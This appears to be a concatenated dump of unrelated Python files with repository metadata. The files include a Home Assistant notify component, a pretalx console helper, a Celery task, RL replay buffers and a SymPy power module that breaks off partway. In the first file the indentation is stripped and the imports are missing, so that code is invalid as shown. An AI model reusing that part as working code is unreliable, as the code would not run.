from homeassistant.const import CONF_NAME, CONF_PLATFORM
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.util import slugify
_LOGGER = logging.getLogger(__name__)
# Platform specific data
ATTR_DATA = 'data'
# Text to notify user of
ATTR_MESSAGE = 'message'
# Target of the notification (user, device, etc)
ATTR_TARGET = 'target'
# Title of notification
ATTR_TITLE = 'title'
ATTR_TITLE_DEFAULT = "Home Assistant"
DOMAIN = 'notify'
SERVICE_NOTIFY = 'notify'
PLATFORM_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): cv.string,
vol.Optional(CONF_NAME): cv.string,
}, extra=vol.ALLOW_EXTRA)
NOTIFY_SERVICE_SCHEMA = vol.Schema({
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_TITLE): cv.template,
vol.Optional(ATTR_TARGET): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(ATTR_DATA): dict,
})
@bind_hass
def send_message(hass, message, title=None, data=None):
"""Send a notification message."""
info = {
ATTR_MESSAGE: message
}
if title is not None:
info[ATTR_TITLE] = title
if data is not None:
info[ATTR_DATA] = data
hass.services.call(DOMAIN, SERVICE_NOTIFY, info)
@asyncio.coroutine
def async_setup(hass, config):
"""Set up the notify services."""
descriptions = yield from hass.async_add_job(
load_yaml_config_file,
os.path.join(os.path.dirname(__file__), 'services.yaml'))
targets = {}
@asyncio.coroutine
def async_setup_platform(p_type, p_config=None, discovery_info=None):
"""Set up a notify platform."""
if p_config is None:
p_config = {}
if discovery_info is None:
discovery_info = {}
platform = yield from async_prepare_setup_platform(
hass, config, DOMAIN, p_type)
if platform is None:
_LOGGER.error("Unknown notification service specified")
return
_LOGGER.info("Setting up %s.%s", DOMAIN, p_type)
notify_service = None
try:
if hasattr(platform, 'async_get_service'):
notify_service = yield from \
platform.async_get_service(hass, p_config, discovery_info)
elif hasattr(platform, 'get_service'):
notify_service = yield from hass.async_add_job(
platform.get_service, hass, p_config, discovery_info)
else:
raise HomeAssistantError("Invalid notify platform.")
if notify_service is None:
_LOGGER.error(
"Failed to initialize notification service %s", p_type)
return
except Exception: # pylint: disable=broad-except
_LOGGER.exception('Error setting up platform %s', p_type)
return
notify_service.hass = hass
@asyncio.coroutine
def async_notify_message(service):
"""Handle sending notification message service calls."""
kwargs = {}
message = service.data[ATTR_MESSAGE]
title = service.data.get(ATTR_TITLE)
if title:
title.hass = hass
kwargs[ATTR_TITLE] = title.async_render()
if targets.get(service.service) is not None:
kwargs[ATTR_TARGET] = [targets[service.service]]
elif service.data.get(ATTR_TARGET) is not None:
kwargs[ATTR_TARGET] = service.data.get(ATTR_TARGET)
message.hass = hass
kwargs[ATTR_MESSAGE] = message.async_render()
kwargs[ATTR_DATA] = service.data.get(ATTR_DATA)
yield from notify_service.async_send_message(**kwargs)
if hasattr(notify_service, 'targets'):
platform_name = (
p_config.get(CONF_NAME) or discovery_info.get(CONF_NAME) or
p_type)
for name, target in notify_service.targets.items():
target_name = slugify('{}_{}'.format(platform_name, name))
targets[target_name] = target
hass.services.async_register(
DOMAIN, target_name, async_notify_message,
descriptions.get(SERVICE_NOTIFY),
schema=NOTIFY_SERVICE_SCHEMA)
platform_name = (
p_config.get(CONF_NAME) or discovery_info.get(CONF_NAME) or
SERVICE_NOTIFY)
platform_name_slug = slugify(platform_name)
hass.services.async_register(
DOMAIN, platform_name_slug, async_notify_message,
descriptions.get(SERVICE_NOTIFY), schema=NOTIFY_SERVICE_SCHEMA)
return True
setup_tasks = [async_setup_platform(p_type, p_config) for p_type, p_config
in config_per_platform(config, DOMAIN)]
if setup_tasks:
yield from asyncio.wait(setup_tasks, loop=hass.loop)
@asyncio.coroutine
def async_platform_discovered(platform, info):
"""Handle for discovered platform."""
yield from async_setup_platform(platform, discovery_info=info)
discovery.async_listen_platform(hass, DOMAIN, async_platform_discovered)
return True
class BaseNotificationService(object):
"""An abstract class for notification services."""
hass = None
def send_message(self, message, **kwargs):
"""Send a message.
kwargs can contain ATTR_TITLE to specify a title.
"""
raise NotImplementedError()
def async_send_message(self, message, **kwargs):
"""Send a message.
kwargs can contain ATTR_TITLE to specify a title.
This method must be run in the event loop and returns a coroutine.
"""
return self.hass.async_add_job(
partial(self.send_message, message, **kwargs))
| 31.723618
| 78
| 0.656423
|
3a3a8e1dc760993c607735e7aad62a78c98bba42
| 1,583
|
py
|
Python
|
src/pretalx/common/console.py
|
Hydro2shine/sprout
|
7dfa5e9fa0a7ef9157517ad0752e393599053873
|
[
"Apache-2.0"
] | null | null | null |
src/pretalx/common/console.py
|
Hydro2shine/sprout
|
7dfa5e9fa0a7ef9157517ad0752e393599053873
|
[
"Apache-2.0"
] | null | null | null |
src/pretalx/common/console.py
|
Hydro2shine/sprout
|
7dfa5e9fa0a7ef9157517ad0752e393599053873
|
[
"Apache-2.0"
] | null | null | null |
BOLD = '\033[1m'
RESET = '\033[0m'
UD = '│'
LR = '─'
SEPARATORS = {
(False, True, True, False): '┬',
(True, False, False, True): '┴',
(False, False, True, True): '┤',
(True, True, False, False): '├',
(False, True, False, True): '┼',
(True, False, True, False): '┼',
}
def get_seperator(*args):
"""(upright, downright, downleft, upleft): Tuple[bool] -> seperator: str"""
if sum(args) >= 3:
return '┼'
elif sum(args) == 1:
return ('└', '┌', '┐', '┘')[args.index(True)]
return SEPARATORS[tuple(args)]
def start_box(size):
try:
print('┏' + '━' * size + '┓')
except (UnicodeDecodeError, UnicodeEncodeError):
print('-' * (size + 2))
def end_box(size):
try:
print('┗' + '━' * size + '┛')
except (UnicodeDecodeError, UnicodeEncodeError):
print('-' * (size + 2))
def print_line(string, box=False, bold=False, color=None, size=None):
text_length = len(string)
alt_string = string
if bold:
string = f'{BOLD}{string}{RESET}'
if color:
string = f'{color}{string}{RESET}'
if box:
if size:
if text_length + 2 < size:
string += ' ' * (size - text_length - 2)
alt_string += ' ' * (size - text_length - 2)
string = f'┃ {string} ┃'
alt_string = f'| {string} |'
try:
print(string)
except (UnicodeDecodeError, UnicodeEncodeError):
try:
print(alt_string)
except (UnicodeDecodeError, UnicodeEncodeError):
print('unprintable setting')
| 26.830508
| 79
| 0.527479
|
5e5aef57289562fa0af368906ed3a5a45c46f647
| 24
|
py
|
Python
|
__init__.py
|
poloarol/pathway-finder
|
a43616f581079b065074b5ecf9d20b725fee9ea3
|
[
"MIT"
] | 1
|
2019-06-06T19:51:14.000Z
|
2019-06-06T19:51:14.000Z
|
__init__.py
|
poloarol/pathway-finder
|
a43616f581079b065074b5ecf9d20b725fee9ea3
|
[
"MIT"
] | 1
|
2019-06-13T19:40:23.000Z
|
2019-06-13T19:40:23.000Z
|
__init__.py
|
poloarol/pathway-finder
|
a43616f581079b065074b5ecf9d20b725fee9ea3
|
[
"MIT"
] | null | null | null |
name = 'pathway_finder'
| 12
| 23
| 0.75
|
925dd4e07d2bb09b1faa2fff4046a7ac8f15cafd
| 282
|
py
|
Python
|
tornado/sleep_task.py
|
dongweiming/speakerdeck
|
497352767a6ec57629f28d5c85f70bef38fc1914
|
[
"Apache-2.0"
] | 6
|
2015-03-02T06:01:28.000Z
|
2016-06-03T09:55:34.000Z
|
tornado/sleep_task.py
|
dongweiming/speakerdeck
|
497352767a6ec57629f28d5c85f70bef38fc1914
|
[
"Apache-2.0"
] | null | null | null |
tornado/sleep_task.py
|
dongweiming/speakerdeck
|
497352767a6ec57629f28d5c85f70bef38fc1914
|
[
"Apache-2.0"
] | 5
|
2015-02-01T13:48:58.000Z
|
2018-11-27T02:10:59.000Z
|
import time
from celery import Celery
celery = Celery("tasks", broker="amqp://guest:guest@localhost:5672")
celery.conf.CELERY_RESULT_BACKEND = "amqp"
@celery.task
def sleep(seconds):
time.sleep(float(seconds))
return seconds
if __name__ == "__main__":
celery.start()
| 20.142857
| 68
| 0.72695
|
28685d31a768bbb31f2a2ef1fc5e4ba87c4c8dbf
| 2,398
|
py
|
Python
|
src/replaybuffer.py
|
sheelabhadra/Learning2Drive
|
f93cb5651c08b87b66b3f2ffc8a3512a9af73db4
|
[
"MIT"
] | 6
|
2020-04-09T01:58:07.000Z
|
2021-12-10T23:24:13.000Z
|
src/replaybuffer.py
|
sheelabhadra/Learning2Drive
|
f93cb5651c08b87b66b3f2ffc8a3512a9af73db4
|
[
"MIT"
] | 7
|
2019-12-28T07:26:43.000Z
|
2022-03-30T21:01:59.000Z
|
src/replaybuffer.py
|
sheelabhadra/Learning2Drive
|
f93cb5651c08b87b66b3f2ffc8a3512a9af73db4
|
[
"MIT"
] | 2
|
2020-07-08T08:01:48.000Z
|
2022-01-06T06:05:43.000Z
|
"""
Data structure for implementing experience replay
"""
from collections import deque, namedtuple
import random
import numpy as np
Transition = namedtuple('Transition', ['state', 'action', 'reward', 'terminal', 'next_state'])
class ReplayBuffer(object):
def __init__(self, buffer_size, random_seed=1234):
self.buffer_size = buffer_size
self.count = 0
# Right side of deque contains newest experience
self.buffer = deque()
random.seed(random_seed)
def add(self, state, action, reward, terminal, next_state):
experience = Transition(state, action, reward, terminal, next_state)
if self.count < self.buffer_size:
self.buffer.append(experience)
self.count += 1
else:
self.buffer.popleft()
self.buffer.append(experience)
def size(self):
return self.count
def sample_batch(self, batch_size):
batch = []
if self.count < batch_size:
batch = random.sample(self.buffer, self.count)
else:
batch = random.sample(self.buffer, batch_size)
return map(np.array, zip(*batch))
def clear(self):
self.buffer.clear()
self.count = 0
class ReplayBuffer2(object):
def __init__(self, buffer_size, random_seed=1234):
self.buffer_size = buffer_size
self.count_positive = 0
self.count_negative = 0
self.buffer_positive = deque()
self.buffer_negative = deque()
random.seed(random_seed)
def add(self, state, action, reward, terminal, next_state):
experience = Transition(state, action, reward, terminal, next_state)
if reward >= 0:
if self.count_positive < self.buffer_size:
self.buffer_positive.append(experience)
self.count_positive += 1
else:
self.buffer_positive.popleft()
self.buffer_positive.append(experience)
else:
if self.count_negative < self.buffer_size:
self.buffer_negative.append(experience)
self.count_negative += 1
else:
self.buffer_negative.popleft()
self.buffer_negative.append(experience)
def size(self):
return self.count_negative + self.count_positive
def sample_batch(self, batch_size):
batch = []
| 31.142857
| 94
| 0.618015
|
1ff7cb94cb612116d0a7da5825f51c5bb086c3e6
| 65,783
|
py
|
Python
|
sympy/core/power.py
|
shubhsherl/sympy
|
b4f1aa3540fe68d078d76e78ba59d022dd6df39f
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/core/power.py
|
shubhsherl/sympy
|
b4f1aa3540fe68d078d76e78ba59d022dd6df39f
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/core/power.py
|
shubhsherl/sympy
|
b4f1aa3540fe68d078d76e78ba59d022dd6df39f
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import print_function, division
from math import log as _log
from .sympify import _sympify
from .cache import cacheit
from .singleton import S
from .expr import Expr
from .evalf import PrecisionExhausted
from .function import (_coeff_isneg, expand_complex, expand_multinomial,
expand_mul)
from .logic import fuzzy_bool, fuzzy_not, fuzzy_and
from .compatibility import as_int, range
from .parameters import global_parameters
from sympy.utilities.iterables import sift
from mpmath.libmp import sqrtrem as mpmath_sqrtrem
from math import sqrt as _sqrt
def isqrt(n):
"""Return the largest integer less than or equal to sqrt(n)."""
if n < 0:
raise ValueError("n must be nonnegative")
n = int(n)
# Fast path: with IEEE 754 binary64 floats and a correctly-rounded
# math.sqrt, int(math.sqrt(n)) works for any integer n satisfying 0 <= n <
# 4503599761588224 = 2**52 + 2**27. But Python doesn't guarantee either
# IEEE 754 format floats *or* correct rounding of math.sqrt, so check the
# answer and fall back to the slow method if necessary.
if n < 4503599761588224:
s = int(_sqrt(n))
if 0 <= n - s*s <= 2*s:
return s
return integer_nthroot(n, 2)[0]
def integer_nthroot(y, n):
"""
Return a tuple containing x = floor(y**(1/n))
and a boolean indicating whether the result is exact (that is,
whether x**n == y).
Examples
========
>>> from sympy import integer_nthroot
>>> integer_nthroot(16, 2)
(4, True)
>>> integer_nthroot(26, 2)
(5, False)
To simply determine if a number is a perfect square, the is_square
function should be used:
>>> from sympy.ntheory.primetest import is_square
>>> is_square(26)
False
See Also
========
sympy.ntheory.primetest.is_square
integer_log
"""
y, n = as_int(y), as_int(n)
if y < 0:
raise ValueError("y must be nonnegative")
if n < 1:
raise ValueError("n must be positive")
if y in (0, 1):
return y, True
if n == 1:
return y, True
if n == 2:
x, rem = mpmath_sqrtrem(y)
return int(x), not rem
if n > y:
return 1, False
# Get initial estimate for Newton's method. Care must be taken to
# avoid overflow
try:
guess = int(y**(1./n) + 0.5)
except OverflowError:
exp = _log(y, 2)/n
if exp > 53:
shift = int(exp - 53)
guess = int(2.0**(exp - shift) + 1) << shift
else:
guess = int(2.0**exp)
if guess > 2**50:
# Newton iteration
xprev, x = -1, guess
while 1:
t = x**(n - 1)
xprev, x = x, ((n - 1)*x + y//t)//n
if abs(x - xprev) < 2:
break
else:
x = guess
# Compensate
t = x**n
while t < y:
x += 1
t = x**n
while t > y:
x -= 1
t = x**n
return int(x), t == y # int converts long to int if possible
def integer_log(y, x):
r"""
Returns ``(e, bool)`` where e is the largest nonnegative integer
such that :math:`|y| \geq |x^e|` and ``bool`` is True if $y = x^e$.
Examples
========
>>> from sympy import integer_log
>>> integer_log(125, 5)
(3, True)
>>> integer_log(17, 9)
(1, False)
>>> integer_log(4, -2)
(2, True)
>>> integer_log(-125,-5)
(3, True)
See Also
========
integer_nthroot
sympy.ntheory.primetest.is_square
sympy.ntheory.factor_.multiplicity
sympy.ntheory.factor_.perfect_power
"""
if x == 1:
raise ValueError('x cannot take value as 1')
if y == 0:
raise ValueError('y cannot take value as 0')
if x in (-2, 2):
x = int(x)
y = as_int(y)
e = y.bit_length() - 1
return e, x**e == y
if x < 0:
n, b = integer_log(y if y > 0 else -y, -x)
return n, b and bool(n % 2 if y < 0 else not n % 2)
x = as_int(x)
y = as_int(y)
r = e = 0
while y >= x:
d = x
m = 1
while y >= d:
y, rem = divmod(y, d)
r = r or rem
e += m
if y > d:
d *= d
m *= 2
return e, r == 0 and y == 1
class Pow(Expr):
"""
Defines the expression x**y as "x raised to a power y"
Singleton definitions involving (0, 1, -1, oo, -oo, I, -I):
+--------------+---------+-----------------------------------------------+
| expr | value | reason |
+==============+=========+===============================================+
| z**0 | 1 | Although arguments over 0**0 exist, see [2]. |
+--------------+---------+-----------------------------------------------+
| z**1 | z | |
+--------------+---------+-----------------------------------------------+
| (-oo)**(-1) | 0 | |
+--------------+---------+-----------------------------------------------+
| (-1)**-1 | -1 | |
+--------------+---------+-----------------------------------------------+
| S.Zero**-1 | zoo | This is not strictly true, as 0**-1 may be |
| | | undefined, but is convenient in some contexts |
| | | where the base is assumed to be positive. |
+--------------+---------+-----------------------------------------------+
| 1**-1 | 1 | |
+--------------+---------+-----------------------------------------------+
| oo**-1 | 0 | |
+--------------+---------+-----------------------------------------------+
| 0**oo | 0 | Because for all complex numbers z near |
| | | 0, z**oo -> 0. |
+--------------+---------+-----------------------------------------------+
| 0**-oo | zoo | This is not strictly true, as 0**oo may be |
| | | oscillating between positive and negative |
| | | values or rotating in the complex plane. |
| | | It is convenient, however, when the base |
| | | is positive. |
+--------------+---------+-----------------------------------------------+
| 1**oo | nan | Because there are various cases where |
| 1**-oo | | lim(x(t),t)=1, lim(y(t),t)=oo (or -oo), |
| | | but lim( x(t)**y(t), t) != 1. See [3]. |
+--------------+---------+-----------------------------------------------+
| b**zoo | nan | Because b**z has no limit as z -> zoo |
+--------------+---------+-----------------------------------------------+
| (-1)**oo | nan | Because of oscillations in the limit. |
| (-1)**(-oo) | | |
+--------------+---------+-----------------------------------------------+
| oo**oo | oo | |
+--------------+---------+-----------------------------------------------+
| oo**-oo | 0 | |
+--------------+---------+-----------------------------------------------+
| (-oo)**oo | nan | |
| (-oo)**-oo | | |
+--------------+---------+-----------------------------------------------+
| oo**I | nan | oo**e could probably be best thought of as |
| (-oo)**I | | the limit of x**e for real x as x tends to |
| | | oo. If e is I, then the limit does not exist |
| | | and nan is used to indicate that. |
+--------------+---------+-----------------------------------------------+
| oo**(1+I) | zoo | If the real part of e is positive, then the |
| (-oo)**(1+I) | | limit of abs(x**e) is oo. So the limit value |
| | | is zoo. |
+--------------+---------+-----------------------------------------------+
| oo**(-1+I) | 0 | If the real part of e is negative, then the |
| -oo**(-1+I) | | limit is 0. |
+--------------+---------+-----------------------------------------------+
Because symbolic computations are more flexible that floating point
calculations and we prefer to never return an incorrect answer,
we choose not to conform to all IEEE 754 conventions. This helps
us avoid extra test-case code in the calculation of limits.
See Also
========
sympy.core.numbers.Infinity
sympy.core.numbers.NegativeInfinity
sympy.core.numbers.NaN
References
==========
.. [1] https://en.wikipedia.org/wiki/Exponentiation
.. [2] https://en.wikipedia.org/wiki/Exponentiation#Zero_to_the_power_of_zero
.. [3] https://en.wikipedia.org/wiki/Indeterminate_forms
"""
is_Pow = True
__slots__ = ['is_commutative']
@cacheit
def __new__(cls, b, e, evaluate=None):
if evaluate is None:
evaluate = global_parameters.evaluate
from sympy.functions.elementary.exponential import exp_polar
b = _sympify(b)
e = _sympify(e)
# XXX: Maybe only Expr should be allowed...
from sympy.core.relational import Relational
if isinstance(b, Relational) or isinstance(e, Relational):
raise TypeError('Relational can not be used in Pow')
if evaluate:
if e is S.ComplexInfinity:
return S.NaN
if e is S.Zero:
return S.One
elif e is S.One:
return b
elif e == -1 and not b:
return S.ComplexInfinity
# Only perform autosimplification if exponent or base is a Symbol or number
elif (b.is_Symbol or b.is_number) and (e.is_Symbol or e.is_number) and\
e.is_integer and _coeff_isneg(b):
if e.is_even:
b = -b
elif e.is_odd:
return -Pow(-b, e)
if S.NaN in (b, e): # XXX S.NaN**x -> S.NaN under assumption that x != 0
return S.NaN
elif b is S.One:
if abs(e).is_infinite:
return S.NaN
return S.One
else:
# recognize base as E
if not e.is_Atom and b is not S.Exp1 and not isinstance(b, exp_polar):
from sympy import numer, denom, log, sign, im, factor_terms
c, ex = factor_terms(e, sign=False).as_coeff_Mul()
den = denom(ex)
if isinstance(den, log) and den.args[0] == b:
return S.Exp1**(c*numer(ex))
elif den.is_Add:
s = sign(im(b))
if s.is_Number and s and den == \
log(-factor_terms(b, sign=False)) + s*S.ImaginaryUnit*S.Pi:
return S.Exp1**(c*numer(ex))
obj = b._eval_power(e)
if obj is not None:
return obj
obj = Expr.__new__(cls, b, e)
obj = cls._exec_constructor_postprocessors(obj)
if not isinstance(obj, Pow):
return obj
obj.is_commutative = (b.is_commutative and e.is_commutative)
return obj
@property
def base(self):
return self._args[0]
@property
def exp(self):
return self._args[1]
@classmethod
def class_key(cls):
return 3, 2, cls.__name__
def _eval_refine(self, assumptions):
from sympy.assumptions.ask import ask, Q
b, e = self.as_base_exp()
if ask(Q.integer(e), assumptions) and _coeff_isneg(b):
if ask(Q.even(e), assumptions):
return Pow(-b, e)
elif ask(Q.odd(e), assumptions):
return -Pow(-b, e)
def _eval_power(self, other):
from sympy import Abs, arg, exp, floor, im, log, re, sign
b, e = self.as_base_exp()
if b is S.NaN:
return (b**e)**other # let __new__ handle it
s = None
if other.is_integer:
s = 1
elif b.is_polar: # e.g. exp_polar, besselj, var('p', polar=True)...
s = 1
elif e.is_extended_real is not None:
# helper functions ===========================
def _half(e):
"""Return True if the exponent has a literal 2 as the
denominator, else None."""
if getattr(e, 'q', None) == 2:
return True
n, d = e.as_numer_denom()
if n.is_integer and d == 2:
return True
def _n2(e):
"""Return ``e`` evaluated to a Number with 2 significant
digits, else None."""
try:
rv = e.evalf(2, strict=True)
if rv.is_Number:
return rv
except PrecisionExhausted:
pass
# ===================================================
if e.is_extended_real:
# we need _half(other) with constant floor or
# floor(S.Half - e*arg(b)/2/pi) == 0
# handle -1 as special case
if e == -1:
# floor arg. is 1/2 + arg(b)/2/pi
if _half(other):
if b.is_negative is True:
return S.NegativeOne**other*Pow(-b, e*other)
if b.is_extended_real is False:
return Pow(b.conjugate()/Abs(b)**2, other)
elif e.is_even:
if b.is_extended_real:
b = abs(b)
if b.is_imaginary:
b = abs(im(b))*S.ImaginaryUnit
if (abs(e) < 1) == True or e == 1:
s = 1 # floor = 0
elif b.is_extended_nonnegative:
s = 1 # floor = 0
elif re(b).is_extended_nonnegative and (abs(e) < 2) == True:
s = 1 # floor = 0
elif fuzzy_not(im(b).is_zero) and abs(e) == 2:
s = 1 # floor = 0
elif _half(other):
s = exp(2*S.Pi*S.ImaginaryUnit*other*floor(
S.Half - e*arg(b)/(2*S.Pi)))
if s.is_extended_real and _n2(sign(s) - s) == 0:
s = sign(s)
else:
s = None
else:
# e.is_extended_real is False requires:
# _half(other) with constant floor or
# floor(S.Half - im(e*log(b))/2/pi) == 0
try:
s = exp(2*S.ImaginaryUnit*S.Pi*other*
floor(S.Half - im(e*log(b))/2/S.Pi))
# be careful to test that s is -1 or 1 b/c sign(I) == I:
# so check that s is real
if s.is_extended_real and _n2(sign(s) - s) == 0:
s = sign(s)
else:
s = None
except PrecisionExhausted:
s = None
if s is not None:
return s*Pow(b, e*other)
def _eval_Mod(self, q):
r"""A dispatched function to compute `b^e \bmod q`, dispatched
by ``Mod``.
Notes
=====
Algorithms:
1. For unevaluated integer power, use built-in ``pow`` function
with 3 arguments, if powers are not too large wrt base.
2. For very large powers, use totient reduction if e >= lg(m).
Bound on m, is for safe factorization memory wise ie m^(1/4).
For pollard-rho to be faster than built-in pow lg(e) > m^(1/4)
check is added.
3. For any unevaluated power found in `b` or `e`, the step 2
will be recursed down to the base and the exponent
such that the `b \bmod q` becomes the new base and
``\phi(q) + e \bmod \phi(q)`` becomes the new exponent, and then
the computation for the reduced expression can be done.
"""
from sympy.ntheory import totient
from .mod import Mod
base, exp = self.base, self.exp
if exp.is_integer and exp.is_positive:
if q.is_integer and base % q == 0:
return S.Zero
if base.is_Integer and exp.is_Integer and q.is_Integer:
b, e, m = int(base), int(exp), int(q)
mb = m.bit_length()
if mb <= 80 and e >= mb and e.bit_length()**4 >= m:
phi = totient(m)
return Integer(pow(b, phi + e%phi, m))
return Integer(pow(b, e, m))
if isinstance(base, Pow) and base.is_integer and base.is_number:
base = Mod(base, q)
return Mod(Pow(base, exp, evaluate=False), q)
if isinstance(exp, Pow) and exp.is_integer and exp.is_number:
bit_length = int(q).bit_length()
# XXX Mod-Pow actually attempts to do a hanging evaluation
# if this dispatched function returns None.
# May need some fixes in the dispatcher itself.
if bit_length <= 80:
phi = totient(q)
exp = phi + Mod(exp, phi)
return Mod(Pow(base, exp, evaluate=False), q)
def _eval_is_even(self):
if self.exp.is_integer and self.exp.is_positive:
return self.base.is_even
def _eval_is_negative(self):
ext_neg = Pow._eval_is_extended_negative(self)
if ext_neg is True:
return self.is_finite
return ext_neg
def _eval_is_positive(self):
ext_pos = Pow._eval_is_extended_positive(self)
if ext_pos is True:
return self.is_finite
return ext_pos
def _eval_is_extended_positive(self):
from sympy import log
if self.base == self.exp:
if self.base.is_extended_nonnegative:
return True
elif self.base.is_positive:
if self.exp.is_extended_real:
return True
elif self.base.is_extended_negative:
if self.exp.is_even:
return True
if self.exp.is_odd:
return False
elif self.base.is_zero:
if self.exp.is_extended_real:
return self.exp.is_zero
elif self.base.is_extended_nonpositive:
if self.exp.is_odd:
return False
elif self.base.is_imaginary:
if self.exp.is_integer:
m = self.exp % 4
if m.is_zero:
return True
if m.is_integer and m.is_zero is False:
return False
if self.exp.is_imaginary:
return log(self.base).is_imaginary
def _eval_is_extended_negative(self):
if self.base.is_extended_negative:
if self.exp.is_odd and self.base.is_finite:
return True
if self.exp.is_even:
return False
elif self.base.is_extended_positive:
if self.exp.is_extended_real:
return False
elif self.base.is_zero:
if self.exp.is_extended_real:
return False
elif self.base.is_extended_nonnegative:
if self.exp.is_extended_nonnegative:
return False
elif self.base.is_extended_nonpositive:
if self.exp.is_even:
return False
elif self.base.is_extended_real:
if self.exp.is_even:
return False
def _eval_is_zero(self):
if self.base.is_zero:
if self.exp.is_extended_positive:
return True
elif self.exp.is_extended_nonpositive:
return False
elif self.base.is_zero is False:
if self.exp.is_negative:
return self.base.is_infinite
elif self.exp.is_nonnegative:
return False
elif self.exp.is_infinite:
if (1 - abs(self.base)).is_extended_positive:
return self.exp.is_extended_positive
elif (1 - abs(self.base)).is_extended_negative:
return self.exp.is_extended_negative
else:
# when self.base.is_zero is None
return None
def _eval_is_integer(self):
b, e = self.args
if b.is_rational:
if b.is_integer is False and e.is_positive:
return False # rat**nonneg
if b.is_integer and e.is_integer:
if b is S.NegativeOne:
return True
if e.is_nonnegative or e.is_positive:
return True
if b.is_integer and e.is_negative and (e.is_finite or e.is_integer):
if fuzzy_not((b - 1).is_zero) and fuzzy_not((b + 1).is_zero):
return False
if b.is_Number and e.is_Number:
check = self.func(*self.args)
return check.is_Integer
def _eval_is_extended_real(self):
from sympy import arg, exp, log, Mul
real_b = self.base.is_extended_real
if real_b is None:
if self.base.func == exp and self.base.args[0].is_imaginary:
return self.exp.is_imaginary
return
real_e = self.exp.is_extended_real
if real_e is None:
return
if real_b and real_e:
if self.base.is_extended_positive:
return True
elif self.base.is_extended_nonnegative and self.exp.is_extended_nonnegative:
return True
elif self.exp.is_integer and self.base.is_extended_nonzero:
return True
elif self.exp.is_integer and self.exp.is_nonnegative:
return True
elif self.base.is_extended_negative:
if self.exp.is_Rational:
return False
if real_e and self.exp.is_extended_negative and self.base.is_zero is False:
return Pow(self.base, -self.exp).is_extended_real
im_b = self.base.is_imaginary
im_e = self.exp.is_imaginary
if im_b:
if self.exp.is_integer:
if self.exp.is_even:
return True
elif self.exp.is_odd:
return False
elif im_e and log(self.base).is_imaginary:
return True
elif self.exp.is_Add:
c, a = self.exp.as_coeff_Add()
if c and c.is_Integer:
return Mul(
self.base**c, self.base**a, evaluate=False).is_extended_real
elif self.base in (-S.ImaginaryUnit, S.ImaginaryUnit):
if (self.exp/2).is_integer is False:
return False
if real_b and im_e:
if self.base is S.NegativeOne:
return True
c = self.exp.coeff(S.ImaginaryUnit)
if c:
if self.base.is_rational and c.is_rational:
if self.base.is_nonzero and (self.base - 1).is_nonzero and c.is_nonzero:
return False
ok = (c*log(self.base)/S.Pi).is_integer
if ok is not None:
return ok
if real_b is False: # we already know it's not imag
i = arg(self.base)*self.exp/S.Pi
return i.is_integer
def _eval_is_complex(self):
if all(a.is_complex for a in self.args) and self._eval_is_finite():
return True
def _eval_is_imaginary(self):
from sympy import arg, log
if self.base.is_imaginary:
if self.exp.is_integer:
odd = self.exp.is_odd
if odd is not None:
return odd
return
if self.exp.is_imaginary:
imlog = log(self.base).is_imaginary
if imlog is not None:
return False # I**i -> real; (2*I)**i -> complex ==> not imaginary
if self.base.is_extended_real and self.exp.is_extended_real:
if self.base.is_positive:
return False
else:
rat = self.exp.is_rational
if not rat:
return rat
if self.exp.is_integer:
return False
else:
half = (2*self.exp).is_integer
if half:
return self.base.is_negative
return half
if self.base.is_extended_real is False: # we already know it's not imag
i = arg(self.base)*self.exp/S.Pi
isodd = (2*i).is_odd
if isodd is not None:
return isodd
if self.exp.is_negative:
return (1/self).is_imaginary
def _eval_is_odd(self):
if self.exp.is_integer:
if self.exp.is_positive:
return self.base.is_odd
elif self.exp.is_nonnegative and self.base.is_odd:
return True
elif self.base is S.NegativeOne:
return True
def _eval_is_finite(self):
if self.exp.is_negative:
if self.base.is_zero:
return False
if self.base.is_infinite or self.base.is_nonzero:
return True
c1 = self.base.is_finite
if c1 is None:
return
c2 = self.exp.is_finite
if c2 is None:
return
if c1 and c2:
if self.exp.is_nonnegative or fuzzy_not(self.base.is_zero):
return True
def _eval_is_prime(self):
'''
An integer raised to the n(>=2)-th power cannot be a prime.
'''
if self.base.is_integer and self.exp.is_integer and (self.exp - 1).is_positive:
return False
def _eval_is_composite(self):
"""
A power is composite if both base and exponent are greater than 1
"""
if (self.base.is_integer and self.exp.is_integer and
((self.base - 1).is_positive and (self.exp - 1).is_positive or
(self.base + 1).is_negative and self.exp.is_positive and self.exp.is_even)):
return True
def _eval_is_polar(self):
return self.base.is_polar
def _eval_subs(self, old, new):
from sympy import exp, log, Symbol
def _check(ct1, ct2, old):
"""Return (bool, pow, remainder_pow) where, if bool is True, then the
exponent of Pow `old` will combine with `pow` so the substitution
is valid, otherwise bool will be False.
For noncommutative objects, `pow` will be an integer, and a factor
`Pow(old.base, remainder_pow)` needs to be included. If there is
no such factor, None is returned. For commutative objects,
remainder_pow is always None.
cti are the coefficient and terms of an exponent of self or old
In this _eval_subs routine a change like (b**(2*x)).subs(b**x, y)
will give y**2 since (b**x)**2 == b**(2*x); if that equality does
not hold then the substitution should not occur so `bool` will be
False.
"""
coeff1, terms1 = ct1
coeff2, terms2 = ct2
if terms1 == terms2:
if old.is_commutative:
# Allow fractional powers for commutative objects
pow = coeff1/coeff2
try:
as_int(pow, strict=False)
combines = True
except ValueError:
combines = isinstance(Pow._eval_power(
Pow(*old.as_base_exp(), evaluate=False),
pow), (Pow, exp, Symbol))
return combines, pow, None
else:
# With noncommutative symbols, substitute only integer powers
if not isinstance(terms1, tuple):
terms1 = (terms1,)
if not all(term.is_integer for term in terms1):
return False, None, None
try:
# Round pow toward zero
pow, remainder = divmod(as_int(coeff1), as_int(coeff2))
if pow < 0 and remainder != 0:
pow += 1
remainder -= as_int(coeff2)
if remainder == 0:
remainder_pow = None
else:
remainder_pow = Mul(remainder, *terms1)
return True, pow, remainder_pow
except ValueError:
# Can't substitute
pass
return False, None, None
if old == self.base:
return new**self.exp._subs(old, new)
# issue 10829: (4**x - 3*y + 2).subs(2**x, y) -> y**2 - 3*y + 2
if isinstance(old, self.func) and self.exp == old.exp:
l = log(self.base, old.base)
if l.is_Number:
return Pow(new, l)
if isinstance(old, self.func) and self.base == old.base:
if self.exp.is_Add is False:
ct1 = self.exp.as_independent(Symbol, as_Add=False)
